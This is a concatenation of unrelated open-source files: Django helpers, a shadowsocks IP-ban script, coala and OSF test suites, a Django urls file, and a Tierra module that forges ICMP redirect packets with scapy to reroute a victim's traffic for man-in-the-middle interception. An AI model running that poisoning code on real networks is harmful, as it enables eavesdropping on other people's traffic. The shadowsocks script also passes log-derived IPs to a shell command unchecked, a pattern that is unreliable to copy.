    """
    target = item
    parts = attribute.split(".")
    while parts:
        target = getattr(target, parts.pop(0))
    return target
def auto_through(field):
    "Returns if the M2M class passed in has an autogenerated through table or not."
    through = field.rel.through
    if not through:
        # Django 1.0/1.1: no explicit through model is recorded at all.
        return True
    # Django 1.2+: a through model exists; it is autogenerated when its
    # Meta is flagged auto_created.
    meta = getattr(through, "_meta", None)
    return getattr(meta, "auto_created", False)
def auto_model(model):
    "Returns if the given model was automatically generated."
    meta = model._meta
    return getattr(meta, "auto_created", False)
def memoize(function):
    """Memoization decorator for zero-argument methods.

    The computed value is cached on the *instance* under ``'_' + name``
    the first time the method runs and served from there afterwards.
    """
    attr = '_' + function.__name__

    def method(self):
        # Compute once, then serve the cached instance attribute.
        if not hasattr(self, attr):
            setattr(self, attr, function(self))
        return getattr(self, attr)

    def invalidate():
        # NOTE(review): this checks/deletes the attribute on the wrapper
        # function object, not on any instance, so it does not clear the
        # per-instance cache set above. Preserved as-is for
        # compatibility — confirm intent before changing.
        if hasattr(method, attr):
            delattr(method, attr)

    method.__name__ = function.__name__
    method.__doc__ = function.__doc__
    method._invalidate = invalidate
    return method
| agpl-3.0 |
smpetrey/shadowsocks | utils/autoban.py | 1033 | 2156 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2015 clowwindy
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import argparse
if __name__ == '__main__':
    # Watch shadowsocks server logs on stdin and ban IPs that repeatedly
    # fail the protocol handshake (likely probes/attacks) via iptables.
    parser = argparse.ArgumentParser(description='See README')
    parser.add_argument('-c', '--count', default=3, type=int,
                        help='with how many failure times it should be '
                             'considered as an attack')
    config = parser.parse_args()
    ips = {}          # failure count per source IP
    banned = set()    # IPs already handed to iptables
    for line in sys.stdin:
        if 'can not parse header when' in line:
            # Log line ends with "<ip>:<port>"; keep only the IP.
            ip = line.split()[-1].split(':')[0]
            if ip not in ips:
                ips[ip] = 1
                print(ip)
                sys.stdout.flush()
            else:
                ips[ip] += 1
                # Ban once the configured failure threshold is reached.
                if ip not in banned and ips[ip] >= config.count:
                    banned.add(ip)
                    cmd = 'iptables -A INPUT -s %s -j DROP' % ip
                    print(cmd, file=sys.stderr)
                    sys.stderr.flush()
                    os.system(cmd)
| apache-2.0 |
sudheesh001/coala | coalib/tests/parsing/StringProcessing/UnescapedSplitTest.py | 4 | 5425 |
from coalib.parsing.StringProcessing import unescaped_split
from coalib.tests.parsing.StringProcessing.StringProcessingTestBase import (
StringProcessingTestBase)
class UnescapedSplitTest(StringProcessingTestBase):
    """Tests for unescaped_split(): splitting that ignores escaped
    occurrences of the separator (backslash-escaped quotes etc.)."""

    # Shorthand for a single backslash, inherited from the test base.
    bs = StringProcessingTestBase.bs

    # Separator used by the basic tests: a single quote.
    test_basic_pattern = r"'"
    # Expected split of each StringProcessingTestBase.test_strings entry.
    test_basic_expected_results = [
        [r"out1 ", r"escaped-escape: \\ ", r" out2"],
        [r"out1 ", r"escaped-quote: \' ", r" out2"],
        [r"out1 ", r"escaped-anything: \X ", r" out2"],
        [r"out1 ", r"two escaped escapes: \\\\ ", r" out2"],
        [r"out1 ", r"escaped-quote at end: \'", r" out2"],
        [r"out1 ", r"escaped-escape at end: " + 2 * bs, r" out2"],
        [r"out1 ", r"str1", r" out2 ", r"str2", r" out2"],
        [r"out1 \' ", r"str1", r" out2 ", r"str2", r" out2"],
        [r"out1 \\\' ", r"str1", r" out2 ", r"str2", r" out2"],
        [r"out1 \\ ", r"str1", r" out2 ", r"str2", r" out2"],
        [r"out1 \\\\ ", r"str1", r" out2 ", r"str2", r" out2"],
        [r"out1 " + 2 * bs, r"str1", r" out2 ", r"str2", r" out2"],
        [r"out1 " + 4 * bs, r"str1", r" out2 ", r"str2", r" out2"],
        [r"out1 ", r"str1", r"", r"str2", r"", r"str3", r" out2"],
        [r""],
        [r"out1 out2 out3"],
        [bs],
        [2 * bs]]

    # Test the basic unescaped_split() functionality.
    def test_basic(self):
        split_pattern = self.test_basic_pattern
        expected_results = self.test_basic_expected_results

        self.assertResultsEqual(
            unescaped_split,
            {(split_pattern, test_string, 0, False, use_regex): result
             for test_string, result in zip(self.test_strings,
                                            expected_results)
             for use_regex in [True, False]},
            list)

    # Test the unescaped_split() function while varying the max_split
    # parameter.
    def test_max_split(self):
        split_pattern = self.test_basic_pattern
        expected_master_results = self.test_basic_expected_results

        for max_split in [1, 2, 3, 4, 5, 6, 7, 8, 9, 112]:
            # Truncate the full expected results to max_split pieces...
            expected_results = [
                elem[0: max_split] for elem in expected_master_results]
            for res, master in zip(expected_results, expected_master_results):
                if max_split < len(master):
                    # max_split is less the length of our master result list,
                    # need to append the rest as a joined string.
                    res.append(str.join(split_pattern, master[max_split:]))

            self.assertResultsEqual(
                unescaped_split,
                {(split_pattern,
                  test_string,
                  max_split,
                  False,
                  use_regex): result
                 for test_string, result in zip(self.test_strings,
                                                expected_results)
                 for use_regex in [True, False]},
                list)

    # Test the unescaped_split() function with different regex patterns.
    def test_regex_pattern(self):
        expected_results = [
            [r"", r"", r"cba###\\13q4ujsabbc\+'**'ac###.#.####-ba"],
            [r"", r"c", r"ccba###\\13q4ujs", r"bc\+'**'ac###.#.####-ba"],
            [r"", r"c", r"ccba###\\13q4ujs", r"bc\+'**'", r"###.#.####-ba"],
            [r"abcabccba###", r"\13q4ujsabbc", r"+'**'ac###.#.####-ba"],
            [r"abcabccba", r"\\13q4ujsabbc\+'**'ac", r".", r".", r"-ba"],
            [r"", r"", r"c", r"", r"cc", r"", r"", r"", r"\13q4ujs", r"", r"",
             r"c\+'**'", r"c", r"", r"", r"", r"", r"-", r"", r""],
            [r"", r"cba###\\13q4ujs", r"\+'**'", r"###.#.####-ba"],
            [r"abcabccba###" + 2 * self.bs,
             r"3q4ujsabbc\+'**'ac###.#.####-ba"]]

        self.assertResultsEqual(
            unescaped_split,
            {(pattern, self.multi_pattern_test_string, 0, False, True): result
             for pattern, result in zip(self.multi_patterns,
                                        expected_results)},
            list)

    # Test the unescaped_split() function for its remove_empty_matches feature.
    def test_auto_trim(self):
        expected_results = [
            [],
            [2 * self.bs, r"\\\\\;\\#", r"\\\'", r"\;\\\\", r"+ios"],
            [r"1", r"2", r"3", r"4", r"5", r"6"],
            [r"1", r"2", r"3", r"4", r"5", r"6", r"7"],
            [],
            [r"Hello world"],
            [r"\;"],
            [2 * self.bs],
            [r"abc", r"a", r"asc"]]

        self.assertResultsEqual(
            unescaped_split,
            {(self.auto_trim_test_pattern,
              test_string,
              0,
              True,
              use_regex): result
             for test_string, result in zip(self.auto_trim_test_strings,
                                            expected_results)
             for use_regex in [True, False]},
            list)

    # Test the unescaped_split() function with regexes disabled.
    def test_disabled_regex(self):
        # With use_regex=False the pattern is literal, so none of the
        # test strings contain it and each splits into itself.
        expected_results = [[x] for x in self.test_strings]

        self.assertResultsEqual(
            unescaped_split,
            {(r"'()", test_string, 0, False, False): result
             for test_string, result in zip(self.test_strings,
                                            expected_results)},
            list)
| agpl-3.0 |
Nesiehr/osf.io | addons/base/testing/models.py | 7 | 22179 | # -*- coding: utf-8 -*-
import abc
import mock
from django.utils import timezone
from framework.auth import Auth
from framework.exceptions import HTTPError
from nose.tools import * # noqa (PEP8 asserts)
from tests.factories import ProjectFactory, UserFactory
from tests.utils import mock_auth
from addons.base import exceptions
from addons.base.testing.utils import MockFolder
class OAuthAddonModelTestSuiteMixinBase(object):
    """Abstract base for the OAuth addon model test-suite mixins.

    Concrete mixins must supply the addon's short/full names and a
    factory for external accounts.
    """

    # BUG FIX: this was misspelled ``___metaclass__`` (three leading
    # underscores), so ABCMeta was never applied and the abstractproperty
    # declarations below were silently unenforced under Python 2.
    __metaclass__ = abc.ABCMeta

    @abc.abstractproperty
    def short_name(self):
        # Addon machine name, e.g. 'box'.
        pass

    @abc.abstractproperty
    def full_name(self):
        # Human-readable addon name, e.g. 'Box'.
        pass

    @abc.abstractproperty
    def ExternalAccountFactory(self):
        # Factory producing ExternalAccount instances for this provider.
        pass
class OAuthAddonUserSettingTestSuiteMixin(OAuthAddonModelTestSuiteMixinBase):
    """Shared tests for addon *user* settings: granting and verifying
    per-node OAuth access to an external account."""

    def setUp(self):
        super(OAuthAddonUserSettingTestSuiteMixin, self).setUp()
        # One project whose creator owns an external account for the addon.
        self.node = ProjectFactory()
        self.user = self.node.creator

        self.external_account = self.ExternalAccountFactory()

        self.user.external_accounts.append(self.external_account)
        self.user.save()

        self.user_settings = self.user.get_or_add_addon(self.short_name)

    def test_grant_oauth_access_no_metadata(self):
        # Granting with no metadata records an empty metadata dict.
        self.user_settings.grant_oauth_access(
            node=self.node,
            external_account=self.external_account,
        )
        self.user_settings.save()

        assert_equal(
            self.user_settings.oauth_grants,
            {self.node._id: {self.external_account._id: {}}},
        )

    def test_grant_oauth_access_metadata(self):
        # Granting with metadata stores it keyed by node and account.
        self.user_settings.grant_oauth_access(
            node=self.node,
            external_account=self.external_account,
            metadata={'folder': 'fake_folder_id'}
        )
        self.user_settings.save()

        assert_equal(
            self.user_settings.oauth_grants,
            {
                self.node._id: {
                    self.external_account._id: {'folder': 'fake_folder_id'}
                },
            }
        )

    def test_verify_oauth_access_no_metadata(self):
        self.user_settings.grant_oauth_access(
            node=self.node,
            external_account=self.external_account,
        )
        self.user_settings.save()

        # Verification passes for the granted account only.
        assert_true(
            self.user_settings.verify_oauth_access(
                node=self.node,
                external_account=self.external_account
            )
        )

        assert_false(
            self.user_settings.verify_oauth_access(
                node=self.node,
                external_account=self.ExternalAccountFactory()
            )
        )

    def test_verify_oauth_access_metadata(self):
        self.user_settings.grant_oauth_access(
            node=self.node,
            external_account=self.external_account,
            metadata={'folder': 'fake_folder_id'}
        )
        self.user_settings.save()

        # Verification requires the metadata to match the grant exactly.
        assert_true(
            self.user_settings.verify_oauth_access(
                node=self.node,
                external_account=self.external_account,
                metadata={'folder': 'fake_folder_id'}
            )
        )

        assert_false(
            self.user_settings.verify_oauth_access(
                node=self.node,
                external_account=self.external_account,
                metadata={'folder': 'another_folder_id'}
            )
        )
class OAuthAddonNodeSettingsTestSuiteMixin(OAuthAddonModelTestSuiteMixinBase):
    """Shared tests for addon *node* settings: auth wiring, folder
    configuration, waterbutler serialization, and contributor/fork/delete
    lifecycle callbacks."""

    @abc.abstractproperty
    def NodeSettingsFactory(self):
        # Factory producing configured node-settings instances.
        pass

    @abc.abstractproperty
    def NodeSettingsClass(self):
        # The node-settings model class under test.
        pass

    @abc.abstractproperty
    def UserSettingsFactory(self):
        # Factory producing user-settings instances.
        pass

    def _node_settings_class_kwargs(self, node, user_settings):
        # Default constructor kwargs; storage-style addons use folder_id.
        return {
            'user_settings': self.user_settings,
            'folder_id': '1234567890',
            'owner': self.node
        }

    def setUp(self):
        super(OAuthAddonNodeSettingsTestSuiteMixin, self).setUp()
        self.node = ProjectFactory()
        self.user = self.node.creator
        self.external_account = self.ExternalAccountFactory()

        self.user.add_addon(self.short_name)
        self.user.external_accounts.append(self.external_account)
        self.user.save()

        # Pre-grant node access to the external account with a folder.
        self.user_settings = self.user.get_addon(self.short_name)
        self.user_settings.grant_oauth_access(
            node=self.node,
            external_account=self.external_account,
            metadata={'folder': '1234567890'}
        )
        self.user_settings.save()

        self.node_settings = self.NodeSettingsFactory(
            **self._node_settings_class_kwargs(self.node, self.user_settings)
        )
        self.node_settings.external_account = self.external_account
        self.node_settings.save()

    def tearDown(self):
        super(OAuthAddonNodeSettingsTestSuiteMixin, self).tearDown()
        self.user_settings.remove()
        self.node_settings.remove()
        self.external_account.remove()
        self.node.remove()
        self.user.remove()

    def test_configured_true(self):
        # Fully wired settings are authed, complete and configured.
        assert_true(self.node_settings.has_auth)
        assert_true(self.node_settings.complete)
        assert_true(self.node_settings.configured)

    def test_configured_false(self):
        self.node_settings.clear_settings()
        self.node_settings.save()
        assert_false(self.node_settings.configured)

    def test_complete_true(self):
        assert_true(self.node_settings.has_auth)
        assert_true(self.node_settings.complete)

    def test_complete_has_auth_not_verified(self):
        # Revoking the grant on the user settings side drops node auth.
        with mock_auth(self.user):
            self.user_settings.revoke_oauth_access(self.external_account)

        self.node_settings.reload()
        assert_false(self.node_settings.has_auth)
        assert_false(self.node_settings.complete)

    def test_complete_auth_false(self):
        self.node_settings.user_settings = None

        assert_false(self.node_settings.has_auth)
        assert_false(self.node_settings.complete)

    def test_fields(self):
        node_settings = self.NodeSettingsClass(user_settings=self.user_settings)
        node_settings.save()
        assert_true(node_settings.user_settings)
        assert_equal(node_settings.user_settings.owner, self.user)
        assert_true(hasattr(node_settings, 'folder_id'))
        assert_true(hasattr(node_settings, 'user_settings'))

    def test_folder_defaults_to_none(self):
        node_settings = self.NodeSettingsClass(user_settings=self.user_settings)
        node_settings.save()
        assert_is_none(node_settings.folder_id)

    def test_has_auth(self):
        # Without an external account the settings are unauthenticated...
        self.user.external_accounts = []
        self.user_settings.reload()

        node = ProjectFactory()
        settings = self.NodeSettingsClass(user_settings=self.user_settings, owner=node)
        settings.save()
        assert_false(settings.has_auth)

        # ...and set_auth with a valid account authenticates them.
        self.user.external_accounts.append(self.external_account)

        settings.set_auth(self.external_account, self.user)
        settings.reload()
        assert_true(settings.has_auth)

    def test_clear_auth(self):
        node_settings = self.NodeSettingsFactory()
        node_settings.external_account = self.ExternalAccountFactory()
        node_settings.user_settings = self.UserSettingsFactory()
        node_settings.save()

        node_settings.clear_auth()

        assert_is_none(node_settings.external_account)
        assert_is_none(node_settings.user_settings)

    def test_clear_settings(self):
        node_settings = self.NodeSettingsFactory()
        node_settings.external_account = self.ExternalAccountFactory()
        node_settings.user_settings = self.UserSettingsFactory()
        node_settings.save()

        node_settings.clear_settings()
        assert_is_none(node_settings.folder_id)

    def test_to_json(self):
        settings = self.node_settings
        user = UserFactory()
        result = settings.to_json(user)
        assert_equal(result['addon_short_name'], self.short_name)

    def test_delete(self):
        assert_true(self.node_settings.user_settings)
        assert_true(self.node_settings.folder_id)
        old_logs = self.node.logs
        self.node_settings.delete()
        self.node_settings.save()
        assert_is(self.node_settings.user_settings, None)
        assert_is(self.node_settings.folder_id, None)
        assert_true(self.node_settings.deleted)
        # delete() must not add a log entry (unlike deauthorize()).
        assert_equal(list(self.node.logs), list(old_logs))

    def test_deauthorize(self):
        assert_true(self.node_settings.user_settings)
        assert_true(self.node_settings.folder_id)
        self.node_settings.deauthorize(auth=Auth(self.user))
        self.node_settings.save()
        assert_is(self.node_settings.user_settings, None)
        assert_is(self.node_settings.folder_id, None)

        last_log = self.node.logs.latest()
        assert_equal(last_log.action, '{0}_node_deauthorized'.format(self.short_name))
        params = last_log.params
        assert_in('node', params)
        assert_in('project', params)

    def test_set_folder(self):
        folder_id = '1234567890'
        self.node_settings.set_folder(folder_id, auth=Auth(self.user))
        self.node_settings.save()
        # Folder was set
        assert_equal(self.node_settings.folder_id, folder_id)
        # Log was saved
        last_log = self.node.logs.latest()
        assert_equal(last_log.action, '{0}_folder_selected'.format(self.short_name))

    def test_set_user_auth(self):
        node_settings = self.NodeSettingsFactory()
        user_settings = self.UserSettingsFactory()
        external_account = self.ExternalAccountFactory()

        user_settings.owner.external_accounts.append(external_account)
        user_settings.save()

        node_settings.external_account = external_account
        node_settings.set_auth(external_account, user_settings.owner)
        node_settings.save()

        assert_true(node_settings.has_auth)
        assert_equal(node_settings.user_settings._id, user_settings._id)
        # A log was saved
        last_log = node_settings.owner.logs.latest()
        assert_equal(last_log.action, '{0}_node_authorized'.format(self.short_name))
        log_params = last_log.params
        assert_equal(log_params['node'], node_settings.owner._primary_key)
        assert_equal(last_log.user, user_settings.owner)

    def test_serialize_credentials(self):
        self.user_settings.external_accounts[0].oauth_key = 'key-11'
        self.user_settings.save()
        credentials = self.node_settings.serialize_waterbutler_credentials()

        expected = {'token': self.node_settings.external_account.oauth_key}
        assert_equal(credentials, expected)

    def test_serialize_credentials_not_authorized(self):
        self.node_settings.user_settings = None
        self.node_settings.save()
        with assert_raises(exceptions.AddonError):
            self.node_settings.serialize_waterbutler_credentials()

    def test_serialize_settings(self):
        settings = self.node_settings.serialize_waterbutler_settings()
        expected = {'folder': self.node_settings.folder_id}
        assert_equal(settings, expected)

    def test_serialize_settings_not_configured(self):
        self.node_settings.clear_settings()
        self.node_settings.save()
        with assert_raises(exceptions.AddonError):
            self.node_settings.serialize_waterbutler_settings()

    def test_create_log(self):
        action = 'file_added'
        path = 'pizza.nii'
        nlog = len(self.node.logs)
        self.node_settings.create_waterbutler_log(
            auth=Auth(user=self.user),
            action=action,
            metadata={'path': path, 'materialized': path},
        )
        self.node.reload()
        assert_equal(len(self.node.logs), nlog + 1)
        assert_equal(
            self.node.logs.latest().action,
            '{0}_{1}'.format(self.short_name, action),
        )
        assert_equal(
            self.node.logs.latest().params['path'],
            path
        )

    def test_after_fork_by_authorized_user(self):
        # Forking by the authorizer carries the user settings over.
        fork = ProjectFactory()
        clone, message = self.node_settings.after_fork(
            node=self.node, fork=fork, user=self.user_settings.owner
        )
        assert_equal(clone.user_settings._id, self.user_settings._id)

    def test_after_fork_by_unauthorized_user(self):
        # Forking by anyone else must not leak the authorizer's auth.
        fork = ProjectFactory()
        user = UserFactory()
        clone, message = self.node_settings.after_fork(
            node=self.node, fork=fork, user=user,
            save=True
        )
        assert_is(clone.user_settings, None)

    def test_before_fork(self):
        node = ProjectFactory()
        message = self.node_settings.before_fork(node, self.user)
        assert_true(message)

    def test_before_remove_contributor_message(self):
        message = self.node_settings.before_remove_contributor(
            self.node, self.user)
        assert_true(message)
        assert_in(self.user.fullname, message)
        assert_in(self.node.project_or_component, message)

    def test_after_remove_authorized_user_not_self(self):
        message = self.node_settings.after_remove_contributor(
            self.node, self.user_settings.owner)
        self.node_settings.save()
        assert_is_none(self.node_settings.user_settings)
        assert_true(message)
        # Removed by someone else: the authorizer may re-authenticate.
        assert_in('You can re-authenticate', message)

    def test_after_remove_authorized_user_self(self):
        auth = Auth(user=self.user_settings.owner)
        message = self.node_settings.after_remove_contributor(
            self.node, self.user_settings.owner, auth)
        self.node_settings.save()
        assert_is_none(self.node_settings.user_settings)
        assert_true(message)
        # Self-removal: no re-authentication hint is shown.
        assert_not_in('You can re-authenticate', message)

    def test_after_delete(self):
        self.node.remove_node(Auth(user=self.node.creator))
        # Ensure that changes to node settings have been saved
        self.node_settings.reload()
        assert_is_none(self.node_settings.user_settings)
        assert_is_none(self.node_settings.folder_id)
class OAuthCitationsTestSuiteMixinBase(OAuthAddonModelTestSuiteMixinBase):
    """Extends the OAuth addon test base with the provider hooks needed
    by citation addons (Mendeley, Zotero, ...)."""

    @abc.abstractproperty
    def ProviderClass(self):
        # Citations provider/config class under test.
        pass

    @abc.abstractproperty
    def OAuthProviderClass(self):
        # OAuth client class used to talk to the citation service.
        pass
class OAuthCitationsNodeSettingsTestSuiteMixin(OAuthAddonNodeSettingsTestSuiteMixin, OAuthCitationsTestSuiteMixinBase):
def setUp(self):
    super(OAuthCitationsNodeSettingsTestSuiteMixin, self).setUp()
    # Citation addons store a folder grant up front so the folder-name
    # and set_folder tests below have an existing grant to compare with.
    self.user_settings.grant_oauth_access(
        node=self.node,
        external_account=self.external_account,
        metadata={'folder': 'fake_folder_id'}
    )
    self.user_settings.save()
def test_fetch_folder_name_root(self):
    # The special 'ROOT' list id maps to the 'All Documents' label.
    self.node_settings.list_id = 'ROOT'

    assert_equal(
        self.node_settings.fetch_folder_name,
        'All Documents'
    )
def test_selected_folder_name_empty(self):
    # No list selected: the folder name is the empty string.
    self.node_settings.list_id = None

    assert_equal(
        self.node_settings.fetch_folder_name,
        ''
    )
def test_selected_folder_name(self):
    # Mock the return from api call to get the folder's name
    mock_folder = MockFolder()
    name = None
    with mock.patch.object(self.OAuthProviderClass, '_folder_metadata', return_value=mock_folder):
        name = self.node_settings.fetch_folder_name

    assert_equal(
        name,
        'Fake Folder'
    )
def test_api_not_cached(self):
    # The first call to .api returns a new object
    with mock.patch.object(self.NodeSettingsClass, 'oauth_provider') as mock_api:
        api = self.node_settings.api
        mock_api.assert_called_once()
        assert_equal(api, mock_api())
def test_api_cached(self):
# Repeated calls to .api returns the same object
with mock.patch.object(self.NodeSettingsClass, 'oauth_provider') as mock_api:
self.node_settings._api = 'testapi'
api = self.node_settings.api
assert_false(mock_api.called)
assert_equal(api, 'testapi')
############# Overrides ##############
# `pass` due to lack of waterbutler- #
# related events for citation addons #
######################################
def _node_settings_class_kwargs(self, node, user_settings):
return {
'user_settings': self.user_settings,
'list_id': 'fake_folder_id',
'owner': self.node
}
def test_serialize_credentials(self):
pass
def test_serialize_credentials_not_authorized(self):
pass
def test_serialize_settings(self):
pass
def test_serialize_settings_not_configured(self):
pass
def test_create_log(self):
pass
def test_set_folder(self):
folder_id = 'fake-folder-id'
folder_name = 'fake-folder-name'
self.node_settings.clear_settings()
self.node_settings.save()
assert_is_none(self.node_settings.list_id)
provider = self.ProviderClass()
provider.set_config(
self.node_settings,
self.user,
folder_id,
folder_name,
auth=Auth(user=self.user),
)
# instance was updated
assert_equal(
self.node_settings.list_id,
'fake-folder-id',
)
# user_settings was updated
# TODO: the call to grant_oauth_access should be mocked
assert_true(
self.user_settings.verify_oauth_access(
node=self.node,
external_account=self.external_account,
metadata={'folder': 'fake-folder-id'}
)
)
log = self.node.logs.latest()
assert_equal(log.action, '{}_folder_selected'.format(self.short_name))
assert_equal(log.params['folder_id'], folder_id)
assert_equal(log.params['folder_name'], folder_name)
@mock.patch('framework.status.push_status_message')
def test_remove_contributor_authorizer(self, mock_push_status):
contributor = UserFactory()
self.node.add_contributor(contributor, permissions=['read', 'write', 'admin'])
self.node.remove_contributor(self.node.creator, auth=Auth(user=contributor))
assert_false(self.node_settings.has_auth)
assert_false(self.user_settings.verify_oauth_access(self.node, self.external_account))
def test_remove_contributor_not_authorizer(self):
contributor = UserFactory()
self.node.add_contributor(contributor)
self.node.remove_contributor(contributor, auth=Auth(user=self.node.creator))
assert_true(self.node_settings.has_auth)
assert_true(self.user_settings.verify_oauth_access(self.node, self.external_account))
@mock.patch('framework.status.push_status_message')
def test_fork_by_authorizer(self, mock_push_status):
fork = self.node.fork_node(auth=Auth(user=self.node.creator))
self.user_settings.reload()
assert_true(fork.get_addon(self.short_name).has_auth)
assert_true(self.user_settings.verify_oauth_access(fork, self.external_account))
@mock.patch('framework.status.push_status_message')
def test_fork_not_by_authorizer(self, mock_push_status):
contributor = UserFactory()
self.node.add_contributor(contributor)
fork = self.node.fork_node(auth=Auth(user=contributor))
assert_false(fork.get_addon(self.short_name).has_auth)
assert_false(self.user_settings.verify_oauth_access(fork, self.external_account))
class CitationAddonProviderTestSuiteMixin(OAuthCitationsTestSuiteMixinBase):
    """Shared tests for a citation addon's OAuth provider wrapper."""
    @abc.abstractproperty
    def ApiExceptionClass(self):
        """Exception class raised by the provider's client library."""
        pass
    def setUp(self):
        super(CitationAddonProviderTestSuiteMixin, self).setUp()
        self.provider = self.OAuthProviderClass()
    @abc.abstractmethod
    def test_handle_callback(self):
        pass
    def test_citation_lists(self):
        # citation_lists should expose the mocked folders (offset by the
        # implicit 'all documents' entry at index 0).
        mock_client = mock.Mock()
        mock_folders = [MockFolder()]
        mock_list = mock.Mock()
        mock_list.items = mock_folders
        mock_client.folders.list.return_value = mock_list
        mock_client.collections.return_value = mock_folders
        self.provider._client = mock_client
        mock_account = mock.Mock()
        self.provider.account = mock_account
        res = self.provider.citation_lists(self.ProviderClass()._extract_folder)
        assert_equal(res[1]['name'], mock_folders[0].name)
        assert_equal(res[1]['id'], mock_folders[0].json['id'])
    def test_client_not_cached(self):
        # The first call to .client returns a new client
        with mock.patch.object(self.OAuthProviderClass, '_get_client') as mock_get_client:
            mock_account = mock.Mock()
            mock_account.expires_at = timezone.now()
            self.provider.account = mock_account
            self.provider.client
            # NOTE(review): the next line is missing '()' and is therefore a
            # no-op attribute access; the assert_true below does the real check.
            mock_get_client.assert_called
            assert_true(mock_get_client.called)
    def test_client_cached(self):
        # Repeated calls to .client returns the same client
        with mock.patch.object(self.OAuthProviderClass, '_get_client') as mock_get_client:
            self.provider._client = mock.Mock()
            res = self.provider.client
            assert_equal(res, self.provider._client)
            assert_false(mock_get_client.called)
    def test_has_access(self):
        # A 403 from the provider API must surface as an HTTPError(403).
        with mock.patch.object(self.OAuthProviderClass, '_get_client') as mock_get_client:
            mock_client = mock.Mock()
            mock_error = mock.PropertyMock()
            mock_error.status_code = 403
            mock_error.text = 'Mocked 403 ApiException'
            mock_client.folders.list.side_effect = self.ApiExceptionClass(mock_error)
            mock_client.collections.side_effect = self.ApiExceptionClass(mock_error)
            mock_get_client.return_value = mock_client
            with assert_raises(HTTPError) as exc_info:
                self.provider.client
            assert_equal(exc_info.exception.code, 403)
| apache-2.0 |
bacemtayeb/Tierra | src/modules/poison/icmp.py | 1 | 2658 | from scapy.all import *
from poison import Poison
from threading import Thread
from zoption import Zoption
import time
import config
import util
class icmp(Poison):
    """ICMP redirect poisoner.

    Repeatedly sends forged ICMP redirect packets so that the victim host
    routes traffic destined for the target through this machine instead.
    """
    def __init__(self):
        super(icmp, self).__init__('ICMP Redirection')
        conf.verb = 0  # silence scapy output
        # (our IP address, our MAC) on the configured interface
        self.local = (config.get('ip_addr'), get_if_hwaddr(config.get('iface')))
        self.victim = ()
        self.target = ()
        self.config.update({"victim_ip":Zoption(type = "ip",
                                                value = None,
                                                required = True,
                                                display = "Redirect host"),
                            "target_ip":Zoption(type = "ip",
                                                value = None,
                                                required = True,
                                                display = "Redirect victim to"),
                            "respoof":Zoption(type = "int",
                                              value = 15,
                                              required = False,
                                              display = "Interval (seconds) to send respoofed redirects")
                            })
        self.info = """
        Send ICMP redirects to a victim. The victim system needs
        to be configured to allow ICMP redirects, which is not
        the default case.
        """
    def initialize(self):
        """ initialize a poison

        Resolves (IP, MAC) pairs for victim and target, then starts the
        injection loop in a background thread.  Returns the victim IP.
        """
        util.Msg('Initializing ICMP poison...')
        self.victim = (self.config['victim_ip'].value,
                       getmacbyip(self.config['victim_ip'].value))
        self.target = (self.config['target_ip'].value,
                       getmacbyip(self.config['target_ip'].value))
        self.running = True
        thread = Thread(target=self.inject)
        thread.start()
        return self.victim[0]
    def inject(self):
        """ Send ICMP redirects to the victim

        Builds one type-5/code-1 (host redirect) packet pointing the victim
        at our own address, then re-sends it every 'respoof' seconds until
        shutdown() clears self.running.
        """
        # icmp redirect
        pkt = IP(src=self.target[0], dst=self.victim[0])
        pkt /= ICMP(type=5, code=1, gw=self.local[0])
        # fake UDP
        pkt /= IP(src=self.victim[0], dst=self.target[0])
        pkt /= UDP()
        while self.running:
            send(pkt)
            time.sleep(self.config['respoof'].value)
        return self.victim[0]
    def shutdown(self):
        """ Shutdown ICMP spoofing

        Signals the injection loop to stop; the loop may take up to one
        'respoof' interval to notice.  Always returns True.
        """
        if self.running:
            util.Msg("Shutting ICMP redirect down "\
                     "(this could take up to %s seconds)" % \
                     self.config['respoof'].value)
            self.running = False
        return True
miaerbus/timebank | main/urls.py | 1 | 1897 | # -*- coding: utf-8 -*-
# Copyright (C) 2009 Tim Gaggstatter <Tim.Gaggstatter AT gmx DOT net>
# Copyright (C) 2010 Eduardo Robles Elvira <edulix AT gmail DOT com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls.defaults import *
from django.conf import settings
from django.views.generic.simple import direct_to_template
# URL routes for the 'main' app.  NOTE(review): this block previously
# contained unresolved merge-conflict markers (<<<<<<< HEAD / ======= /
# >>>>>>>), which are a SyntaxError at import time.  The conflict is
# resolved by keeping the HEAD side (the extra static pages); the other
# side added no lines of its own.
urlpatterns = patterns('main.views',
    url(r'^contact/$', 'contact', name="contact"),
    url(r'^about/$', 'about', name="about"),
    url(r'^links/$', 'links', name="links"),
    url(r'^faq/$', 'faq', name="faq"),
    url(r'^rules/$', 'rules', name="rules"),
    url(r'^terms/$', 'terms', name="terms"),
    #url(r'^googlecc86ba186a99e8a4/$', 'googlecc86ba186a99e8a4', name="googlecc86ba186a99e8a4"),
    url(r'^set_language/$', 'set_language', name="set_language"),
    url(r'^report1.csv$', 'report1', name="report1"),
    url(r'^report2.csv$', 'report2', name="report2"),
    url(r'^report3.csv$', 'report3', name="report3"),
    url(r'^report4.csv$', 'report4', name="report4"),
    url(r'^report5.csv$', 'report5', name="report5"),
    (r'^/?$', 'index'),
